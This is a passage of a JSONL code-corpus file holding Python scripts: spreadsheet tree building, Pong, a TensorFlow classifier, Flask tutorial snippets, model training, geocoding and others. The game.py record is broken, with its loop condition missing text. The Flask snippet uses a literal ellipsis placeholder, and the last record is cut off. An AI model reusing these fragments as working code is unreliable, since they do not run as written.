+{"seq_id":"339821326","text":"#!/usr/bin/python\n#coding=utf-8\nfrom openpyxl import load_workbook, worksheet, workbook \nimport sys\n\n\ndef getWorkSheet( name ):\n\tarkusz = load_workbook( name )\n\tws = arkusz.get_active_sheet()\n\treturn ws\n\ndef getCells( ws ):\n\trows = []\n\tfor r in ws.rows:\n\t\tif r[1].value == None:\n\t\t\tcontinue\n\t\trows.append( { 'id' : r[0].value, 'val' : unicode( r[1].value ) } )\n\treturn rows\n\ndef getTreeKeywordCount( rows ):\n\tnw = []\n\tfor cell in rows:\n\t\tif 'BRAND EQUITY BENEFITS' in cell['val'] or 'COPY STRATEGY MESSAGE' in cell['val']:\n\t\t\tcell['ncount'] = 1\n\t\telse:\n\t\t\tcell['ncount'] = cell['val'].count( 'NET' ) + cell['val'].count( 'sub' ) + cell['val'].count( 'net' )\n\t\tnw.append( cell )\n\treturn nw\n\ndef getRowDepth( rows ):\n\tdepth = 0\n\tnw = []\n\tfor row in rows:\n\t\tif row['ncount'] != 0:\n\t\t\tdepth = row['ncount']\n\t\t\trow['depth'] = depth\n\t\t\tnw.append( row )\n\t\t\tcontinue\n\t\trow['depth'] = depth+1\n\t\tnw.append( row )\n\treturn nw\n\ndef buildTreeNode( rows, parent ):\n\tif len( rows ) == 0: \n\t\treturn\n\tdepth = rows[0]['depth']\n\tnowy = { 'id' : rows[0]['id'], 'val' : rows[0]['val'], 'sub' : [] }\n\tparent['sub'] += [ nowy ]\n\trows.pop(0)\n\twhile len( rows ) > 0 and rows[0]['depth'] > depth:\n\t\tbuildTreeNode( rows, nowy )\n\ndef buildTree( cells ):\n\troot = { 'id' : None, 'val' : 'root', 'sub' : [] }\n\twhile len( cells ) > 0:\n\t\tbuildTreeNode( cells, root )\n\treturn root\n\ndef showTreeAtLevel( tree, level ):\n\tif level == 0:\n\t\treturn\n\tout = tree['val'] if len( tree['val'] ) < 20 else tree['val'][:20] + '...'\n\tprint( ( 6 - level )*'\\t' + tree['id'] + ' ' + out )\n\tfor t in tree['sub']:\n\t\tshowTreeAtLevel( t, level-1)\n\ndef saveTree( root, ws, level ):\n\tif root['val'] != 'root':\n\t\tif root['id'] != None:\n\t\t\tws.cell( row = saveTree.c, column = level ).value = root['id']\n\t\t\tlevel += 1\n\t\tws.cell( row = saveTree.c, column = level ).value = root['val']\n\t\tsaveTree.c += 1\n\telse:\n\t\tlevel = -1\n\tfor node in root['sub']:\n\t\tsaveTree( node, ws, level+1 )\nsaveTree.c = 0\n\nws = getWorkSheet( sys.argv[1] )\ncells = getCells( ws )\ncells = getTreeKeywordCount( cells )\ncells = getRowDepth( cells )\nroot = buildTree( cells )\ngotowe = ws.parent.create_sheet( title = 'gotowe' )\nsaveTree( root, gotowe, 0 )\ngotowe.parent.save( 'gotowe.xlsx' )\n","sub_path":"excel_drzewo2.py","file_name":"excel_drzewo2.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"425474747","text":"from random import randint\ncomputer_wins=0\nplayer_wins=0\nnum=3\nwhile player_winscomputer_wins:\n\tprint(\"......youuuu wonnnn....\")\nelif player_wins==computer_wins:\n\tprint(\"..IT'S A TIE..\")\nelse:\n\tprint(\"....sorry youuuu loose...\")","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"494863336","text":"from bfex.components.data_pipeline.tasks import Task\nfrom bfex.common.exceptions import WorkflowTaskArgumentException, ScraperException, WorkflowException \n\nclass Workflow(object):\n \"\"\"A workflow is a series of tasks to be run in sequence.\n\n Each task is verified prior to running, by calling the is_requirement_satisfied method of the task. It will only\n be run if that method returns true. The result of each step is stored in last_result, and can be accessed if needed.\n \"\"\"\n\n def __init__(self, tasks, init_data=None):\n \"\"\"Creates a new workflow with the passed in series of tasks.\n\n :param list tasks: A list of Task class references to be instantiated and run.\n :param init_data: Any initialization data that should be fed into the first task.\n :exception ValueError: If the tasks list is empty\n :exception TypeError: If any of the class references in tasks are not a subclass of Task\n \"\"\"\n self.tasks = tasks\n self.steps = len(tasks)\n self.current_step = 0\n self.last_result = init_data\n\n \"\"\"TODO: It would be cool to support dynamic loading of classes at runtime. So we could specify a workflow\n # as a list of string names of the tasks. You could define new workflows from an api that way.\n \"\"\"\n if self.steps < 1:\n raise ValueError(\"A workflow must contain at least one step.\")\n\n for task in tasks:\n if not issubclass(task, Task):\n raise TypeError(\"A workflow must be made up of only of references to Task classes.\")\n\n def get_current_task(self):\n \"\"\"Returns the next task to be run.\"\"\"\n return self.tasks[self.current_step]\n\n def get_last_result(self):\n \"\"\"Returns the result of the previously ran task.\"\"\"\n return self.last_result\n\n def run_next(self):\n \"\"\"Runs the next task in the workflow.\n\n :exception WorkflowTaskArgumentException: If a task receives unsatisfactory data.\n :returns False if there are no more steps to be run, True if the step succeeds.\n \"\"\"\n if self.current_step >= self.steps:\n return False\n\n \"\"\"Fetch the class of the next task, and instantiate it\"\"\"\n current_task = self.get_current_task()() \n \n if current_task.is_requirement_satisfied(self.last_result):\n try:\n result = current_task.run(self.last_result)\n except ScraperException:\n return False\n\n self.last_result = result\n self.current_step += 1\n else:\n raise WorkflowException(\"{} received an unsatisfactory argument - {}\"\n .format(current_task.task_name, self.last_result))\n \n return True\n\n def run(self):\n \"\"\"Runs the entire workflow, from the current step to finish.\n\n :returns The result of the final task.\n \"\"\"\n is_finished = False\n\n while not is_finished:\n is_finished = not self.run_next()\n\n return self.last_result\n\n\nif __name__ == \"__main__\":\n \"\"\"Testing Purposes\"\"\"\n from bfex.components.data_pipeline.tasks import *\n from elasticsearch_dsl import connections\n connections.create_connection()\n Keywords.init()\n Document.init()\n\n search = Faculty.search()\n allFaculty = [faculty for faculty in search.scan()]\n for faculty in allFaculty:\n\n if isinstance(faculty, str):\n faculty_name = faculty\n else:\n faculty_name = faculty.name\n print(faculty)\n\n tasks = [FacultyPageScrape, UpdateFacultyFromScrape, ResearchIdPageScrape, GoogleScholarPageScrape, GetKeywordsFromScrape, UpdateKeywordsFromGenerator]\n workflow_manager = Workflow(tasks, faculty_name)\n workflow_manager.run()\n","sub_path":"web/bfex/components/data_pipeline/workflow.py","file_name":"workflow.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"416327977","text":"from ProductFactory import ProductFactory\nfrom DancingSkeleton import DancingSkeleton\nfrom RCSpider import RCSpider\nfrom PumpkinCaramelToffee import PumpkinCaramelToffee\n\n\nclass HalloweenProductFactory(ProductFactory):\n\n def create_toy(self, order):\n product_id = order.product_id\n # collects details of orders\n keys = ['has_batteries', 'min_age', 'name', 'desc', 'speed',\n 'jump_height', 'has_glow', 'type', 'spider_type']\n properties = {key: value for key, value in order.details.items() if key in keys}\n\n order.details['error'] = self.toy_exception(properties)\n if order.details['error'] != \"false\":\n order.details['corrupted'] = True\n\n return RCSpider(product_id, properties=properties)\n\n def create_stuffed_animal(self, order):\n product_id = order.product_id\n # collects details of orders\n keys = ['stuffing', 'size', 'fabric', 'name', 'desc',\n 'has_glow', 'jump_height']\n properties = {key: value for key, value in order.details.items() if key in keys}\n exception = self.stuffed_animal_exception(properties)\n\n order.details['error'] = self.stuffed_animal_exception(properties)\n if order.details['error'] != \"false\":\n order.details['corrupted'] = True\n\n return DancingSkeleton(product_id, properties=properties)\n\n def create_candy(self, order):\n product_id = order.product_id\n # collects details of orders\n keys = ['nuts', 'lactose', 'name', 'desc', 'variety']\n properties = {key: value for key, value in order.details.items() if key in keys}\n\n order.details['error'] = self.candy_exception(properties)\n if order.details['error'] != \"false\":\n order.details['corrupted'] = True\n\n return PumpkinCaramelToffee(product_id, properties=properties)\n\n def toy_exception(self, properties):\n if properties['min_age'] < 0:\n return \"Age must be greater than 0\"\n if properties['has_glow'] != 'Y' and properties['has_glow'] != 'N':\n return \"has_glow must be Y and N\"\n if properties['spider_type'] != 'Tarantula' and properties['spider_type'] != 'Wolf Spider':\n return \"Spider type must be Tarantula and Wolf Spider\"\n\n return \"false\"\n\n def stuffed_animal_exception(self, properties):\n if properties['stuffing'] != 'Polyester Fibrefill' and properties['stuffing'] != 'Wool':\n return \"Stuffing can only by Polyester Fiberfill or Wool\"\n\n if properties['size'] != 'S' and properties['size'] != 'M' and properties['size'] != 'L':\n return \"size must be either S, M, or L\"\n\n if properties['fabric'] != 'Linen' and properties['fabric'] != 'Cotton' and \\\n properties['fabric'] != 'Acrylic':\n return \"size must be either S, M, or L\"\n\n if properties['has_glow'] != 'Y' and properties['has_glow'] != 'N':\n return \"has_glow must be Y or N\"\n\n return \"false\"\n\n def candy_exception(self, properties):\n if properties['variety'] != 'Sea Salt' and properties['variety'] != 'Regular':\n return \"variety Sea Salt or Regular\"\n","sub_path":"Assignments/Assignment2/HalloweenProductFactory.py","file_name":"HalloweenProductFactory.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"91107592","text":"\nimport turtle\nwn=turtle.Screen()\nwn.title(\"Pong by @jalshivam\")\nwn.bgcolor(\"black\")\nwn.setup(height=600,width=800)\nwn.tracer(0)\n\n#score\nscore_a=0\nscore_b=0\n\n\n\n#PADDLE A:\npaddle_a=turtle.Turtle()\npaddle_a.speed(0)\npaddle_a.shape(\"square\")\npaddle_a.color(\"white\")\npaddle_a.shapesize(stretch_wid=5, stretch_len=1)\npaddle_a.penup()\npaddle_a.goto(-300,0)\n\n#PADDLE B:\npaddle_b=turtle.Turtle()\npaddle_b.speed(0)\npaddle_b.shape(\"square\")\npaddle_b.color(\"white\")\npaddle_b.shapesize(stretch_wid=5, stretch_len=1)\npaddle_b.penup()\npaddle_b.goto(300,0)\n\n#BALL:\nball=turtle.Turtle()\nball.speed(0)\nball.shape(\"circle\")\nball.color(\"white\")\nball.penup()\nball.goto(0,0)\n\n#moving the ball\n#differentate the ball movement into two parts namely\n#the x axis movement and the y axis movement\nball.dx=.3\nball.dy=.3\n\n\n# Pen\npen=turtle.Turtle()\npen.speed(0)\npen.color(\"white\")\npen.penup()\npen.hideturtle()\npen.goto(0,260)\npen.write(\"Player A: 0 Player B: 0\",align=\"center\" ,font=(\"Courier\",24 ,\"normal\") ) \n\n\n\n\n#Functions\n#to move paddle_A upwards\ndef paddle_a_up():\n y=paddle_a.ycor()\n y=y+20\n paddle_a.sety(y)\n\n\n#to move paddle a downwards\ndef paddle_a_down():\n y=paddle_a.ycor()\n y=y-20\n paddle_a.sety(y)\n\n#to move paddle_b upwards\ndef paddle_b_up():\n y=paddle_b.ycor()\n y=y+20\n paddle_b.sety(y)\n\n\n#to move paddle b downwards\ndef paddle_b_down():\n y=paddle_b.ycor()\n y=y-20\n paddle_b.sety(y)\n \n \n \n\n\n#Keyboard binding\nwn.listen()\nwn.onkey(paddle_a_up,\"w\")\nwn.onkey(paddle_a_down,\"s\")\nwn.onkey(paddle_b_up,\"Up\")\nwn.onkey(paddle_b_down,\"Down\")\n\n\n\n\n\n#MAIN FILE FOR GAME LOOP\nwhile True:\n wn.update()\n\n #MOve the ball\n ball.setx(ball.xcor() + ball.dx) \n ball.sety(ball.ycor() + ball.dy)\n\n #Border Checking\n if ball.ycor()>300:\n ball.sety(300)\n ball.dy = ball.dy*-1\n\n if ball.ycor()<-300:\n ball.sety(-300)\n ball.dy = ball.dy*-1\n \n if ball.xcor()>400:\n ball.goto(0,0)\n ball.dx*=-1 \n score_a=score_a + 1\n pen.clear()\n pen.write(\"Player A: {} Player B: {}\".format(score_a,score_b),align=\"center\" ,font=(\"Courier\",24 ,\"normal\") ) \n\n if ball.xcor()<-400:\n ball.goto(0,0)\n ball.dx*=1 \n score_b=score_b + 1 \n pen.clear()\n pen.write(\"Player A: {} Player B: {}\".format(score_a,score_b),align=\"center\" ,font=(\"Courier\",24 ,\"normal\") ) \n\n\n #Collisions\n if ball.xcor()>300 and ball.ycor() < paddle_b.ycor() + 50 and ball.ycor() > paddle_b.ycor() - 50: \n ball.dx*=-1\n if ball.xcor()<-300 and ball.ycor() < paddle_a.ycor() + 50 and ball.ycor() > paddle_a.ycor() - 50: \n ball.dx *= -1\n\n","sub_path":"pong_game.py","file_name":"pong_game.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"548306406","text":"from tables.base_table_class import Base_Table\n\nclass RELATIONSHIP_CHILDREN_Table(Base_Table):\n\t\"The definition of the Relationship Children Table in the database\"\n\n\ttable_name = \"RELATIONSHIP_CHILDREN\"\n\n\tdef __init__(self) :\n\t\tself.table_name = RELATIONSHIP_CHILDREN_Table.table_name\n\t\tself.columns = Base_Table.columns + [\"Estimate: Total\",\n\t\t\t\t\t\"Estimate: Own child - Biological child\",\n\t\t \t\t\t\"Estimate: Own child - Adopted child\",\n\t\t\t\t\t\"Estimate: Own child - Stepchild\",\n\t\t\t\t\t\"Estimate: Grandchild\",\n\t\t\t\t\t\"Estimate: Other relatives\",\n\t\t\t\t\t\"Estimate: Foster child or Other Unrelated child\"]\n\t\tself.table_extra_meta_data = Base_Table.table_extra_meta_data\n\n\t\tself.initalize()\n\n\tdef getInsertQueryForCSV(self, csvFile, fromYear, toYear) :\n\t\tskipCount = 0\n\t\tinsertDataQuery = \"\"\"REPLACE INTO `{0}` VALUES \"\"\".format(self.table_name)\n\t\tfor line in csvFile:\n\t\t\trow = line.split(\",\")\n\t\t\tif (skipCount < Base_Table.num_of_rows_to_leave) :\n\t\t\t\tskipCount += 1\n\t\t\t\tcontinue\n\n\t\t\tdefaultQuery = self.getIDAndYearQueryForRow(row, fromYear, toYear)\n\t\t\tdataQuery = \"%d, %d, %d, %d, %d, %d, %d\" %(int(row[3]),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tint(row[5]),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tint(row[6]),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tint(row[7]),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tint(row[8]),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tint(row[9]),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tint(row[10]))\n\t\t\tinsertDataQuery += \"(\" + defaultQuery + dataQuery + \"),\"\n\n\t\tinsertDataQuery = insertDataQuery[:-1]\n\t\tinsertDataQuery += \";\"\n\t\treturn insertDataQuery\n","sub_path":"wca_server/tables/demographics/relationship_children_table.py","file_name":"relationship_children_table.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"654377921","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n# 设置x,y\nx = np.linspace(-1,1,50)\ny = 2 * x + 1\n\nprint(x)\nprint(y)\n\n# 启动图像窗口\nplt.figure()\n# 把数据x,y传给plt画图\nplt.plot(x,y)\n# 显示图\nplt.show()\n\n# 画一条直线,给出X,Y点的坐标就可以了\nx0 = 1\ny0 = 2 * x0 + 1\nplt.figure(figsize=(8,5))\nplt.xlim(-1,10)\nplt.ylim(-1,10)\nplt.plot([x0, x0,], [0, y0,], 'k--', linewidth=2.5)\nplt.plot(x,y)\nplt.show()\n","sub_path":"src/hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"211300073","text":"#%%Logging and Monitoring Basics with tf.contrib.learn \nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n\nimport numpy as np\nimport tensorflow as tf\n\ntf.logging.set_verbosity(tf.logging.INFO)\n\n# Data sets\nIRIS_TRAINING =\"/home/keetsky/Desktop/tensorflow_learn/iris_training.csv\"\nIRIS_TEST = \"/home/keetsky/Desktop/tensorflow_learn/iris_test.csv\"\n\n\n # Load datasets.\ntraining_set = tf.contrib.learn.datasets.base.load_csv_with_header(\n filename=IRIS_TRAINING, target_dtype=np.int, features_dtype=np.float32)\ntest_set = tf.contrib.learn.datasets.base.load_csv_with_header(\n filename=IRIS_TEST, target_dtype=np.int, features_dtype=np.float32)\n\n # Specify that all features have real-value data\nfeature_columns = [tf.contrib.layers.real_valued_column(\"\", dimension=4)]\n\nvalidation_monitor = tf.contrib.learn.monitors.ValidationMonitor(test_set.data,\n test_set.target,\n every_n_steps=50)\n\n\n # Build 3 layer DNN with 10, 20, 10 units respectively.\nclassifier = tf.contrib.learn.DNNClassifier(feature_columns=feature_columns,\n hidden_units=[10, 20, 10],\n n_classes=3,\n model_dir=\"/tmp/iris_model\",\n config=tf.contrib.learn.RunConfig(save_checkpoints_secs=1))\n\n # Fit model.\nclassifier.fit(x=training_set.data,\n y=training_set.target,\n steps=2000,\n monitors=[validation_monitor])\n\n # Evaluate accuracy.\naccuracy_score = classifier.evaluate(x=test_set.data,\n y=test_set.target)[\"accuracy\"]\nprint('Accuracy: {0:f}'.format(accuracy_score))\n\n # Classify two new flower samples.\nnew_samples = np.array(\n [[6.4, 3.2, 4.5, 1.5], [5.8, 3.1, 5.0, 1.7]], dtype=float)\ny = list(classifier.predict(new_samples, as_iterable=True))\nprint('Predictions: {}'.format(str(y)))\n","sub_path":"官方教程程序/8 Logging and Monitoring Basics with tf_contrib_learn/Logging and Monitoring Basics with tf_contrib_learn .py","file_name":"Logging and Monitoring Basics with tf_contrib_learn .py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"376904616","text":"import sys\nimport random\nfrom PySide2.QtUiTools import QUiLoader\nfrom PySide2.QtWidgets import QApplication\nfrom PySide2.QtCore import QFile, QIODevice\n\ndef add_item():\n window.main_list.addItem(f\"test {random.randint(0, 100)}\")\n\ndef remove_item():\n selected_items = window.main_list.selectedItems()\n for item in selected_items:\n selection = window.main_list.takeItem(window.main_list.row(item))\n\ndef clear_list():\n window.main_list.clear()\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n\n ui_file = QFile(\"mywidget.ui\")\n if not ui_file.open(QIODevice.ReadOnly):\n print(\"Cannot open {}: {}\".format(ui_file_name, ui_file.errorString()))\n sys.exit(-1)\n loader = QUiLoader()\n window = loader.load(ui_file)\n ui_file.close()\n\n window.button_add.clicked.connect(add_item)\n window.button_remove.clicked.connect(remove_item)\n window.button_clear.clicked.connect(clear_list)\n\n if not window:\n print(loader.errorString())\n sys.exit(-1)\n window.show()\n\n sys.exit(app.exec_())\n","sub_path":"examples/02_widget_ui/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"651945476","text":"#! /usr/bin/python3\nfrom PIL import Image\nimport sys\n\nisLandscape = lambda x: max(x)==x[0]\n\ndef getImageFromWeb(url):\n '''\n '''\n \ndef getImageFromDisk(file):\n try:\n im = Image.open(file)\n except:\n return \"Error opening image...\"\n else:\n print(\"Opened image {}\".format(file))\n return process(im, file)\n \ndef process(im, file=\"output.jpg\"):\n if isLandscape(im.size) == False:\n return \"Please provide landscape image. Only they are supported as of now\"\n else:\n new_im = Image.new(im.mode, (max(im.size), max(im.size)), color=0)\n new_im.paste(im, box=(0, (im.size[0]-im.size[1])//2))\n outfile = '{}_i.jpg'.format(file[:-4])\n new_im.save(outfile)\n return \"Image saved as {}\".format(outfile)\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print (\"Please provide input file!\")\n else:\n res = getImageFromDisk(sys.argv[1])\n print(res)\n \n \n","sub_path":"whatsapp_dp.py","file_name":"whatsapp_dp.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"210938138","text":"from flask import Flask # WSGI(Web Server Gateway Interface) : 인터페이스 정의 규칙\r\nfrom flask import url_for\r\nfrom flask import request\r\nfrom flask import render_template\r\nfrom flask import Markup\r\n# from werkzeug import secure_filename\r\nfrom flask import make_response\r\nfrom flask import abort, redirect\r\nfrom flask import session, escape\r\n\r\nimport os\r\n\r\napp = Flask(__name__)\r\napp.debug = True\r\n\r\n# #세션\r\n# @app.route('/')\r\n# def index():\r\n# if 'username' in session:\r\n# return 'Logged in as %s' %escape(session['username'])\r\n# return 'U r not logged in'\r\n\r\n@app.route('/login', methods=['GET', 'POST'])\r\ndef login():\r\n if request.method == 'POST':\r\n session['username'] = request.form['username']\r\n return redirect(url_for('index'))\r\n return 0\r\n\r\n@app.route('/logout')\r\ndef logout():\r\n session.pop('username', None)\r\n return redirect(url_for('index'))\r\napp.secret_key = os.urandom(24)\r\n\r\n#쿠키\r\n@app.route('/')\r\ndef hello_world():\r\n #쿠키 읽기\r\n username = request.cookies.get('username')\r\n #쿠키 저장\r\n resp = make_response(render_template(...))\r\n resp.set_cookie('username', 'the username')\r\n return 'Hello World!'+Markup('Hello %s!') % 'hacker'+Markup.escape('hacker')+Markup('Marked up » HTML').striptags()\r\n\r\n# #리디렉션\r\n# @app.route('/')\r\n# def index():\r\n# return redirect(url_for('login'))\r\n\r\n# #일찍 중단\r\n# @app.route('/login')\r\n# def login():\r\n# abort(401)\r\n# this_is_never_executed()\r\n\r\n#에러페이지\r\n@app.errorhandler(404)\r\ndef page_not_found(error):\r\n return render_template('page_not_found.html'), 404\r\n@app.errorhandler(404)\r\ndef not_found(error):\r\n resp = make_response(render_template('error.html'), 404)\r\n resp.headers['X-Something'] = 'A value'\r\n return resp\r\n\r\n#<>로 정보받기\r\n@app.route('/user//')\r\ndef show_user_profile(username):\r\n return 'User %s' %username\r\n@app.route('/post//')\r\ndef show_post(post_id):\r\n return 'Post %d' %post_id\r\n\r\n# #로그인\r\n# @app.route('/login', methods=['GET', 'POST'])\r\n# def login():\r\n# error = None\r\n# searchword = request.args.get('key', '')\r\n# if request.method == 'POST':\r\n# # print('POST')\r\n# # return 'POST'\r\n# if valid_login(request.form['username'],\r\n# request.form['password']):\r\n# return log_the_user_in(request.form['username'])\r\n# else:\r\n# # print('GET')\r\n# # return 'GET'\r\n# error = 'Invalid username/password'\r\n#\r\n# return render_template('login.html', error=error)\r\n\r\n#파일\r\n@app.route('/upload', methods=['GET', 'POST'])\r\ndef upload_file():\r\n if request.method == 'POST':\r\n f = request.files['the_file']\r\n f.save('/var/www/uploads/uploaded_file.txt')\r\n # f.save('/var/www/uploads/' + secure_filename(f.filename)\r\n\r\n#값 넘기기\r\n@app.route('/hello/')\r\n@app.route('/hello/')\r\ndef hello(name=None):\r\n return render_template('hello.html', name=name)\r\n\r\n#라우팅이 설정된 함수의 URL을 얻기위해 실제 요청처럼 처리\r\nwith app.test_request_context():\r\n print(url_for('hello_world'))\r\n print(url_for('show_user_profile', username='Jhon'))\r\n print(url_for('login', next='/'))\r\n print(url_for('static', filename='style.css'))\r\n\r\n#ToDO ?\r\nwith app.test_request_context('/hello', method='POST'):\r\n assert request.path == '/hello'\r\n assert request.method == 'POST'\r\n\r\n#ToDo ?\r\n# with app.request_context(environ):\r\n# assert request.method == 'POST'\r\n\r\n#TODO ? 메시지 플래싱?\r\n\r\n#로깅\r\napp.logger.debug('A value for debugging')\r\napp.logger.warning('A warning occurred (%d apples)', 42)\r\napp.logger.error('An error occurred')\r\n\r\n#미들웨어에서 후킹\r\nfrom werkzeug.contrib.fixers import LighttpdCGIRootFix\r\napp.wsgi_app = LighttpdCGIRootFix(app.wsgi_app)\r\n\r\n#실행\r\nif __name__ == '__main__':\r\n app.run()\r\n # app.run(host='0.0.0.0')","sub_path":"practice/run_fast.py","file_name":"run_fast.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"279953039","text":"from torch.nn.modules.loss import BCELoss\nfrom torch.utils.data.dataloader import DataLoader\nfrom adapter_entity_typing.utils import prepare_entity_typing_dataset\nfrom adapter_entity_typing.network import get_model, add_classifier, PARAMETERS\nfrom torch.utils.data import DataLoader\nfrom torch.optim import Adam\nimport torch\nimport numpy as np\nimport random\nimport os\nfrom tqdm import tqdm\nfrom adapter_entity_typing.network_classes.classifiers import adapterPLWrapper, EarlyStoppingWithColdStart\nfrom pytorch_lightning.callbacks import ModelCheckpoint\nfrom pytorch_lightning import Trainer\nfrom pytorch_lightning.loggers import TensorBoardLogger\n\n\nif torch.cuda.is_available():\n print('gpu on')\n # torch.set_default_tensor_type('torch.cuda.FloatTensor')\n\n\ndef declare_callbacks_and_trainer(model):\n callbacks = [] \n experiment_name = model.configuration(\"ExperimentName\")\n early_stopping_patience = model.configuration(\"Patience\", \"train\")\n epochs = model.configuration(\"MaxEpochs\", \"train\")\n cold_start = model.configuration(\"ColdStart\", \"train\")\n limit_val_batches = model.configuration(\"LimitValBatches\", \"train\")\n early_stop_callback = EarlyStoppingWithColdStart(\n monitor='example_macro/macro_f1',\n min_delta=0.00,\n patience=early_stopping_patience,\n verbose=False,\n mode='max',\n strict=True,\n cold_start_epochs=cold_start)\n callbacks.append(early_stop_callback)\n checkpoint_callback = ModelCheckpoint(monitor='example_macro/macro_f1',\n dirpath=model.configuration(\"PathModel\", \"train\"),\n filename=experiment_name,\n mode='max',\n save_last=False)\n callbacks.append(checkpoint_callback)\n logger = TensorBoardLogger(model.configuration(\"LightningPath\", \"train\"),\n name=experiment_name,\n default_hp_metric=False)\n\n trainer = Trainer(callbacks=callbacks,\n logger=logger,\n gpus = 1, \n max_epochs=epochs,\n limit_train_batches=300,\n limit_val_batches=limit_val_batches,\n precision = 16)\n return trainer\n\n\n\ndef get_pretrained_name(base_name, i):\n return \"{}-v{}.ckpt\".format(base_name, i) if i else \"{}.ckpt\".format(base_name)\n\n \ndef get_random_seed():\n i = 0\n while True:\n yield i if i else 236451 # https://www.wikidata.org/wiki/Q75179705\n i += 1\n\n\ndef train(experiment):\n print(\"Starting \" + experiment + \"\\n\\n\")\n for i, s in enumerate(get_random_seed(), 1):\n torch.manual_seed(s)\n torch.cuda.manual_seed(s)\n np.random.seed(s)\n random.seed(s)\n torch.backends.cudnn.enabled = False\n torch.backends.cudnn.deterministic = True\n torch.cuda.empty_cache()\n \n model = get_model(experiment)\n \n try:\n pretrained_name = model.configuration(\"Traineds\", \"train\")[i - 1]\n except IndexError:\n break\n print(\"\\n\\nTraining {} for the {} time\".format(experiment, i))\n if os.path.isfile(pretrained_name):\n print(\"Skipping\")\n continue\n\n # load data and initialize classifier & dataloaders\n train_dataset, label2id = prepare_entity_typing_dataset(model, \"train\")\n dev_dataset, label2id = prepare_entity_typing_dataset(model, \"dev\", label2id)\n add_classifier(model = model, labels = label2id)\n\n train_dataset.label_number = len(label2id)\n\n batch_size = model.configuration('BatchSize')\n train_loader = DataLoader(train_dataset, batch_size = batch_size, shuffle = True, num_workers=20, pin_memory = True)\n dev_loader = DataLoader(dev_dataset, batch_size = batch_size, num_workers=20, shuffle = True, pin_memory = True)\n\n # start training :D\n id2label = {v: k for k,v in label2id.items()}\n pl_wrapper = adapterPLWrapper(model, id2label)\n \n trainer = declare_callbacks_and_trainer(model)\n trainer.fit(pl_wrapper, train_loader, dev_loader)\n print(\"Saving on \" + pretrained_name)\n\n # if you have enough, stop it\n if i - 1 >= model.configuration(\"n\", \"train\"):\n break\n\n\nif __name__ == \"__main__\":\n import sys\n train(sys.argv[1])\n","sub_path":"adapter_entity_typing/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"145203565","text":"import os\nfrom geopy.geocoders import Nominatim, GoogleV3\nimport googlemaps\nfrom googlemaps import places\n\n\nclass MetaDataFromCoordinates:\n def __init__(self, lat, long):\n self.lat = lat\n self.long = long\n\n def get_name(self):\n gm_client = googlemaps.Client(os.environ['api_google_key'])\n gmap = places.places_nearby(client=gm_client, location={'lat': self.lat, 'lng': self.long}, radius=25)\n res = gmap['results']\n for i in range(len(res)):\n if 'gas_station' in res[i]['types']:\n name = res[i]['name']\n return name\n\n def get_address(self):\n geo = GoogleV3(os.environ['api_google_key'])\n res = str(geo.geocode(f\"{self.lat}, {self.long}\"))\n street = res.split(',')\n geolocator = Nominatim(user_agent=os.environ['google_user_agent'])\n location = geolocator.geocode(f\"{street[0]}, {street[1]}, {street[2]}\")\n return location.address\n\n\n","sub_path":"processor/imageMetadata/coordinates_metadata.py","file_name":"coordinates_metadata.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"96301859","text":"import json\nclass RoboConfig():\n def __init__(self,cfg_file = \"./config.cfg\"):\n self.cfg_file = cfg_file\n def load(self):\n with open(self.cfg_file,\"r\") as f:\n cfg = f.read()\n if cfg:\n self.cfg = json.loads(cfg)\n def dump(self):\n with open(self.cfg_file,\"w\") as f:\n f.write(json.dumps(self.cfg))\n def reset(self):\n self.cfg = {\n \"cap\":0,\n \"isVideo\":False,\n \"isRecord\":False,\n \"recordPath\":\"./record\",\n \"red_config\":{\n \"hmin\":4,\n \"hmax\":17,\n \"smin\":203,\n \"smax\":360,\n \"vmin\":27,\n \"vmax\":258,\n \"thre1\":5,\n \"thre2\":11,\n \"ratio_min\":1,\n \"ratio_max\":9,\n \"offset_x\":150,\n \"offset_y\":0\n },\n \"blue_config\":{\n \"hmin\":111,\n \"hmax\":180,\n \"smin\":228,\n \"smax\":360,\n \"vmin\":22,\n \"vmax\":360,\n 